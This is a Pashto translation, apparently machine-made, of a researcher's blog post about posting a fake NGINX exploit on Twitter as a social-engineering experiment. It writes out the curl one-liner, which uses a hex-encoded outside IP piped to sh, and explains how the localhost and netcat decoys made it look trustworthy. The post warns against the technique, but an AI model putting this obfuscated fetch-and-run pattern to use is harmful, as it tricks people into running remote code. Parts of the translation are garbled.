نوټ. ژباړه: اصلي یادښت، چې د جون په لومړۍ نیټه خپور شو، پریکړه وکړه چې د معلوماتو امنیت سره علاقه لرونکو کسانو ترمنځ تجربه ترسره کړي. د دې کولو لپاره، هغه په ویب سرور کې د ناڅرګند شوي زیانمننې لپاره جعلي استحصال چمتو کړ او په خپل ټویټر کې یې خپور کړ. د هغه انګیرنې - په سمدستي توګه د متخصصینو لخوا افشا شوي چې په کوډ کې به ښکاره فریب وګوري - نه یوازې دا چې ریښتیا نه دي ... دوی له ټولو تمو څخه ډیر شوي ، او په مخالف لوري کې: ټویټ د ډیری خلکو لخوا خورا لوی ملاتړ ترلاسه کړ چې دا یې نه دی کړی. د هغې محتويات وګورئ.
TL؛ DR: په هیڅ حالت کې په sh یا bash کې د فایل پایپ لاین مه کاروئ. دا ستاسو د کمپیوټر کنټرول له لاسه ورکولو عالي لاره ده.
زه غواړم تاسو سره د مزاحیہ PoC استحصال په اړه یوه لنډه کیسه شریک کړم چې د می په 31 رامینځته شوی. هغه د خبرونو په ځواب کې سمدستي راڅرګند شو , غړی (ZDI)، چې په NGINX کې د زیانمننې په اړه معلومات چې د RCE (د لرې کوډ اجرا کولو) لامل کیږي ډیر ژر به افشا شي. له هغه وخته چې NGINX ډیری ویب پاڼې ځواکوي، خبرونه باید یو بم وي. مګر د "مسؤلانه افشاء کولو" پروسې کې د ځنډ له امله، د څه پیښ شوي توضیحات ندي پیژندل شوي - دا د ZDI معیاري کړنلاره ده.
په NGINX کې د زیان مننې افشا کولو په اړه
په curl کې د نوي مغشوش کولو تخنیک باندې د کار کولو پای ته رسیدو سره ، ما اصلي ټویټ حواله کړ او "یو کاري PoC لیک یې کړ" چې د کوډ یو واحد کرښه لري چې ګمان کیږي د کشف شوي زیان څخه ګټه پورته کوي. البته، دا په بشپړه توګه بې مانا وه. ما ګومان وکړ چې زه به سمدلاسه افشا شم ، او دا چې په غوره توګه به زه یو څو ریټویټونه ترلاسه کړم (او ښه).
د جعلي استحصال سره
په هرصورت، ما تصور نه شو کولی چې وروسته څه پیښ شي. زما د ټویټ شهرت آسمان ته ورسید. په حیرانتیا سره، اوس مهال (15:00 د مسکو وخت د جون 1) لږ شمیر خلک پوه شوي چې دا جعلي دی. ډیری خلک پرته له دې چې چیک کړي یې بیا ټویټ کوي (یوازې پریږدئ چې د ښکلي ASCII ګرافیکونو ستاینه وکړئ چې دا یې تولیدوي).
یوازې وګورئ چې دا څومره ښکلی دی!
پداسې حال کې چې دا ټول لوپونه او رنګونه عالي دي ، دا روښانه ده چې خلک باید د دوی لیدلو لپاره په خپل ماشین کې کوډ چل کړي. خوشبختانه، براوزرونه ورته کار کوي، او د دې حقیقت سره یوځای چې زه واقعیا نه غواړم قانوني ستونزې ته ورسیږم، زما په سایټ کې ښخ شوی کوډ یوازې د اکو تلیفونونه کول پرته له دې چې کوم اضافي کوډ نصب یا اجرا کړي.
یو کوچنی انحراف: , ، زه او د ټیم نور هلکان موږ د یو څه مودې لپاره د کرل کمانډونو مبهم کولو لپاره مختلف لارو سره لوبې کوو ځکه چې دا ښه دی ... او موږ ګیکس یو. netspooky او dnz ډیری نوي میتودونه کشف کړل چې زما لپاره خورا ژمن ښکاري. زه په ساتیرۍ کې شامل شوم او هڅه مې وکړه چې د چلونو کڅوړه کې د IP لسیزې تبادلې اضافه کړم. دا معلومه شوه چې IP هم د هیکساډیسیمل ب formatه کې بدلیدلی شي. سربیره پردې ، curl او ډیری نور NIX اوزار په خوښۍ سره د هیکساډیسیمل IPs خوري! نو دا یوازې د قناعت وړ او خوندي لید کمانډ لاین رامینځته کولو مسله وه. په نهایت کې ما پدې اړه پریکړه وکړه:
curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhostټولنیز - بریښنایی انجینري (SEE) - یوازې د فشینګ څخه ډیر
خوندیتوب او پیژندنه د دې تجربې لویه برخه وه. زما په اند دوی هغه څه دي چې د هغه بریالیتوب لامل شوی. د کمانډ لاین په واضح ډول د "127.0.0.1" (د پیژندل شوي ځایی کوربه) په حواله امنیت په کلکه معنی لري. Localhost خوندي ګڼل کیږي او پدې کې ډاټا هیڅکله ستاسو کمپیوټر نه پریږدي.
پیژندنه د تجربې دوهم کلیدي SEE برخه وه. څرنګه چې په نښه شوي لیدونکي په اصل کې د کمپیوټر امنیت اساساتو سره آشنا خلکو څخه جوړ وو، نو دا مهمه وه چې کوډ جوړ کړئ ترڅو د هغې برخې پیژندل شوي او پیژندل شوي (او له همدې امله خوندي وي). د پخوانیو استحصالي مفکورو څخه د عناصرو پور اخیستل او په غیر معمولي ډول سره یوځای کول خورا بریالي ثابت شوي.
لاندې د یو لاینر مفصل تحلیل دی. په دې لیست کې هرڅه اغوندي کاسمیټیک طبیعت، او په عملي توګه د دې اصلي عملیاتو لپاره هیڅ شی ته اړتیا نشته.
کوم اجزا واقعیا اړین دي؟ دا -gsS, -O 0x0238f06a, |sh او پخپله ویب سرور. د ویب سرور هیڅ ناوړه لارښوونې نه درلودې، مګر په ساده ډول د کمانډونو په کارولو سره د ASCII ګرافیک خدمت کوي echo په سکریپټ کې شامل دي index.html. کله چې کارونکي سره کرښه داخله کړه |sh په منځ کې، index.html بار شوی او اعدام شوی. خوشبختانه، د ویب سرور ساتونکي هیڅ ناوړه اراده نه درلوده.
-
../../../%00- د لارښود څخه هاخوا استازیتوب کوي؛ -
ngx_stream_module.so- د تصادفي NGINX ماډل ته لاره؛ -
/bin/sh%00<'protocol:TCP'- موږ فکر کوو پیل کوو/bin/shپه هدف ماشین کې او محصول د TCP چینل ته لیږل؛ -
-O 0x0238f06a#PLToffset- پټ اجزا، ضمیمه#PLToffsetد حافظې په څیر ښکاري چې په PLT کې یو څه شتون لري؛ -
|sh;- بله مهمه برخه. موږ اړتیا درلوده چې محصول sh/bash ته واړوو ترڅو کوډ اجرا کړو چې د برید کونکي ویب سرور څخه راځي0x0238f06a(2.56.240.x); -
nc /dev/tcp/localhost- یو ډمی چې netcat ته اشاره کوي/dev/tcp/localhostنو هر څه بیا خوندي ښکاري. په حقیقت کې، دا هیڅ نه کوي او د ښکلا لپاره په کرښه کې شامل دي.
دا د یوې کرښې سکریپټ کوډ کولو او د "ټولنیز - بریښنایی انجینرۍ" (پیچلي فشینګ) د اړخونو بحث پای ته رسوي.
د ویب سرور ترتیب او ضد اقدامات
څرنګه چې زما ډیری پیرودونکي infosec/hackers دي، ما پریکړه وکړه چې ویب سرور د دوی په برخه کې د "ګټو" څرګندونو ته یو څه نور مقاومت وکړي، یوازې د دې لپاره چې هلکان یو څه وکړي (او دا به په زړه پورې وي. چمتو کول). زه دلته ټول زیانونه لیست نه کړم ځکه چې تجربه لاهم روانه ده، مګر دلته یو څو شیان دي چې سرور یې کوي:
- په فعاله توګه په ځینو ټولنیزو شبکو کې د توزیع هڅې څاري او د بیاکتنې مختلف تمبیلونه ځای په ځای کوي ترڅو کاروونکي وهڅوي چې لینک باندې کلیک وکړي.
- د شیل سکریپټ ښودلو پرځای د Thugcrowd پروموشنل ویډیو ته Chrome/Mozilla/Safari/etc ته لارښوونه کوي.
- د مداخلې / ښکاره هیکنګ ښکاره نښو لپاره ګوري، او بیا د NSA سرورونو ته د غوښتنو لیږل پیل کوي (ha!).
- په ټولو کمپیوټرونو کې د ټروجن او همدارنګه د BIOS روټکیټ نصبوي چې کاروونکي یې د منظم براوزر څخه کوربه ته مراجعه کوي (یوازې ټوکې کول!).
د antimers یوه کوچنۍ برخه
په دې حالت کې، زما یوازینۍ موخه دا وه چې د اپاچي ځینې ځانګړتیاوې ماسټر کړم - په ځانګړې توګه، د غوښتنو د لیږلو لپاره غوره قواعد - او ما فکر کاوه: ولې نه؟
د NGINX استحصال (حقیقي!)
ګډون وکړئ په ټویټر کې او په NGINX کې د خورا ریښتیني زیانونو او فرصتونو څخه ګټه پورته کولو کې د ZDI عالي کار تعقیب کړئ. د دوی کار تل ما زړه راښکونکی کړی او زه د الیس څخه مننه کوم چې د ټولو ذکرونو او خبرتیاوو سره د هغې صبر لپاره زما د احمق ټویټ لامل شوی. خوشبختانه، دا یو څه ښه هم کړي: دا د NGINX زیانونو په اړه د پوهاوي لوړولو کې مرسته کړې، او همدارنګه د curl ناوړه ګټه اخیستنې له امله رامینځته شوي ستونزې.
سرچینه: www.habr.com